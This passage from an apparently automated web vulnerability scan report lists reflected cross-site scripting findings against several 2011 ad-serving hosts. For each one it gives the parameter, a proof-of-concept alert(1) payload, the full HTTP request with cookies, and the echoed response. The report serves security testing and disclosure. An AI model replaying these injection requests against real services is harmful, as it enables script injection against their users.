Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; acb757416=5_[r^XI()vsh<co>bPMvW_l44?enc=AAAAAAAA8D_NzMzMzMzsPwAAAKCZmfk_zczMzMzM7D8AAAAAAADwP0t2I4uVLkAzSsYda6b2ziVhr8pNAAAAAJdIBgA3AQAAMgMAAAIAAABXAgQAfL8AAAEAAABVU0QAVVNEAKAAWAKqAQAAPw8BAgUCAAUAAAAACyF_DAAAAAA.&tt_code=cm.pub_webmd&udj=uf%28%27a%27%2C+9940%2C+1305128822%29%3Buf%28%27c%27%2C+59839%2C+1305128822%29%3Buf%28%27r%27%2C+262743%2C+1305128822%29%3B&cnd=!mhzYQwi_0wMQ14QQGAAg_P4CMAE4qgNAAEiyBlCXkRlYAGDaAWgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABArkBAAAAAAAA8D_BAQAAAAAAAPA_yQGamZmZmZnxP9ABANAB4V0.&ccd=!TQWvKgi_0wMQ14QQGPz-AiAA; uuid2=2724386019227846218; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 11:40:14 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 11:40:14 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:14 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193f2784'-alert(1)-'79a228804ed&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

4.79. http://admeld.adnxs.com/usersync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56dd9'-alert(1)-'f19d2452188 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match56dd9'-alert(1)-'f19d2452188 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; acb757416=5_[r^XI()vsh<co>bPMvW_l44?enc=AAAAAAAA8D_NzMzMzMzsPwAAAKCZmfk_zczMzMzM7D8AAAAAAADwP0t2I4uVLkAzSsYda6b2ziVhr8pNAAAAAJdIBgA3AQAAMgMAAAIAAABXAgQAfL8AAAEAAABVU0QAVVNEAKAAWAKqAQAAPw8BAgUCAAUAAAAACyF_DAAAAAA.&tt_code=cm.pub_webmd&udj=uf%28%27a%27%2C+9940%2C+1305128822%29%3Buf%28%27c%27%2C+59839%2C+1305128822%29%3Buf%28%27r%27%2C+262743%2C+1305128822%29%3B&cnd=!mhzYQwi_0wMQ14QQGAAg_P4CMAE4qgNAAEiyBlCXkRlYAGDaAWgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABArkBAAAAAAAA8D_BAQAAAAAAAPA_yQGamZmZmZnxP9ABANAB4V0.&ccd=!TQWvKgi_0wMQ14QQGPz-AiAA; uuid2=2724386019227846218; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 11:40:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 11:40:26 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:26 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match56dd9'-alert(1)-'f19d2452188?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

4.80. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 20743<script>alert(1)</script>2dc6e370893 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/74269720743<script>alert(1)</script>2dc6e370893?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjFp47PDiITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYoNJIo0ZD9h4gSR2t6eX%2Bx%2FvwBCsGtyeY2n2TujHgBvTG%2BOKQ4qYoHHIwCcAEMBdNBHdKy17BavWQ9ZY77OrEDINIg1XDOObQOMHgCjJhYvvPUetd3CRKpcfmSZlq5gkiP6%2BTF%2B9H%2BYUa1jLmSW036QqX1%2BmfKP6Ns3zY8yzQBi7s3J7OHh4jvaxE5RmaKbXB4kqguFLGpV9pfqzKR2k0rtnngbgUsbdqym9abDOQa21stM%2BZ904IVzmE7JGYsst5yCLj41ykxWGUwv5bBOElWhM5XZAX9%2FMFIAF1JUSrh%2FiP4PV6Aw%3D%3D"; vsd=0@1@4dcaa3a0@d.xp1.ru4.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Thu, 12 May 2011 11:41:23 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/74269720743<script>alert(1)</script>2dc6e370893

4.81. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 4c3ea<script>alert(1)</script>9e43e26b8da was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1517620&placementId=1517562&pid=8857684c3ea<script>alert(1)</script>9e43e26b8da&ps=-1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:57 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2951


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "8857684c3ea<script>alert(1)</script>9e43e26b8da"

   
                                                           </head>
...[SNIP]...

4.82. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 2ebb1--><script>alert(1)</script>46c8034e10 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1517620&placementId=15175622ebb1--><script>alert(1)</script>46c8034e10&pid=885768&ps=-1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:46 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3512


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "15175622ebb1--><script>alert(1)</script>46c8034e10" -->
...[SNIP]...

4.83. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 7aee0--><script>alert(1)</script>b7befdbe7d1 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1517620&placementId=1517562&pid=885768&ps=-17aee0--><script>alert(1)</script>b7befdbe7d1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:40:08 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3954


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-17aee0--><script>alert(1)</script>b7befdbe7d1" -->
   
...[SNIP]...

4.84. http://ads1.revenue.net/j [r_num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads1.revenue.net
Path:   /j

Issue detail

The value of the r_num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 773cd'%3balert(1)//8a6389b8181 was submitted in the r_num parameter. This input was echoed as 773cd';alert(1)//8a6389b8181 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /j?site_id=12169&pplacement_id=1&r_num=58437537773cd'%3balert(1)//8a6389b8181 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:54:57 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CACl2OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo1ODQzNzUzNzc3M2NkJzthbGVydCgxKS8vOGE2Mzg5YjgxOFgGDDowOjEzMDUyNDQ0OTc6MbABBDAxMjk3Oi0pBAAHMTMwNTIwMTI5NxEAAA==; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 359

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');


document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/227245/index.html?O_R_NUM=58437537773cd';alert(1)//8a6389b8181&O_RANK=1&O_CREATIVE_ID=227245&O_PPLACEMENT_ID=1&O_SITE_ID=12169&">
...[SNIP]...

4.85. http://ads1.revenue.net/j [site_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads1.revenue.net
Path:   /j

Issue detail

The value of the site_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2f3e'%3balert(1)//3c32c462e94 was submitted in the site_id parameter. This input was echoed as a2f3e';alert(1)//3c32c462e94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /j?site_id=12169a2f3e'%3balert(1)//3c32c462e94&pplacement_id=1&r_num=58437537 HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CAB9sOjE6MToxMjE2OToyMjcyNDU6MzQ0MDo3MzQzODkxNDoxOjA6MTMwMzU3NzM4MjoxsAEEMzQxODI6LSkEAIwEmgJ8dnQEIAdOATE3dAVgDAIzNDExNylEAQktOjEzMDM1MzQxODIRAAA=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:54:56 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 227245
Set-Cookie: Train0=.CADt2OjE6MToxMjE2OWEyZjNlJzthbGVydCgxKS8vM2MzMmM0NjJlOTQ6MjI3MjQ1OjM0NDA6NTg0Mzc1Mzc6MTowOjEzMDUyNDQ0OTY6MbABBDAxMjk2Oi0pBAAHMTMwNTIwMTI5NhEAAA==; path=/; domain=.revenue.net; expires=Fri, 10 Jun 2022 05:05:41 GMT
Content-Type: text/html
Content-Length: 359

document.write('<SCRIPT TYPE="text/javascript" SRC="http://panther1.cpxinteractive.com/mz/ds.js"></SCRIPT>');


document.write('<script language="JavaScript" src="http://ads1.revenue.net/load/227245/index.html?O_R_NUM=58437537&O_RANK=1&O_CREATIVE_ID=227245&O_PPLACEMENT_ID=1&O_SITE_ID=12169a2f3e';alert(1)//3c32c462e94&">
...[SNIP]...

4.86. http://adserving.cpxinteractive.com/st [ad_size parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
Path:   /st

Issue detail

The value of the ad_size request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abf19'-alert(1)-'e26e9738d4e was submitted in the ad_size parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=pop&ad_size=0x0abf19'-alert(1)-'e26e9738d4e&section=1748713&banned_pop_types=29&pop_times=1&pop_frequency=0&pop_nofreqcap=1 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://pepperhamilton.com/?epl=7VC_ZCF-qAinEUr8RrN2ElD1UYCHhMIpkrv4HU2ICSZqhp18zI-zQHkE8C0nDiTMgf6MYi8CRELFJtdUQvTEgSRGY6_nrN4UxmreqxnQEBZqbC2uTdEKuiAxNRMZ27auTDPfJeH2pRYyoMlkMtKon5opgpo8kGkayibaQBF1ACAQ3Oe_AADgfwUAAECA2wgAAKo-CvBZUyZZQTE2aFpCgwAAAPA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
